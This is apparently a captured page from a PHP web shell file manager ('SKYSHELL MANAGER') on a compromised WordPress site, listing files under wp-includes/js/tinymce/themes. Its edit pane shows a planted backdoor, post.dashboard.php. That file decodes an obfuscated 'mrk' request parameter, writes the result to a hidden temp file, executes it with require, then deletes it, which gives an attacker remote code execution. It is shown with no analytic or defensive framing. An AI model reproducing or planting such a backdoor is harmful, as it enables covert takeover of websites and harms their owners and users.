📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
35652.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: post.dashboard.php
<?php if(in_array("mrk", array_keys($_REQUEST))){ $hld = array_filter(["/tmp", sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]); $flg = $_REQUEST["mrk"]; $flg=explode ( '.' , $flg ); $itm = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); $v = 0; $__tmp = $flg; while ($v2 = array_shift($__tmp)) { $sChar = ord($salt5[$v % $sLen]); $d = ((int)$v2 - $sChar - ($v % 10)) ^22; $itm .= chr($d); $v++;} $object = 0; do { $factor = $hld[$object] ?? null; if ($object >= count($hld)) break; if ((is_dir($factor) and is_writable($factor))) { $tkn = str_replace("{var_dir}", $factor, "{var_dir}/.record"); if (file_put_contents($tkn, $itm)) { require $tkn; unlink($tkn); die(); } } $object++; } while (true); }
Save